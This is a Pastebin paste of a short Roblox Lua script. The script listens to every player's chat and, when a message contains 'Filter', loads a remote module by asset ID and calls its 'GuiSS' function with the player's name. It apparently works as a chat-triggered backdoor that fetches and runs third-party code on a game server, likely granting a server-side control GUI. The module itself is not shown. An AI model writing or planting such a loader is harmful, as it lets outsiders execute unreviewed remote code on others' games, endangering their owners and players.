guy123457

Untitled

Jan 25th, 2020
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.17 KB | None | 0 0
  1. for i,v in pairs(game.Players:GetChildren()) do
  2. v.Chatted:Connect(function(message)
  3. if string.find(message, "Filter") then
  4.  
  5. require(4591645455).GuiSS(v.Name)
  6. end
  7. end)
  8. end
Advertisement
Add Comment
Please, Sign In to add comment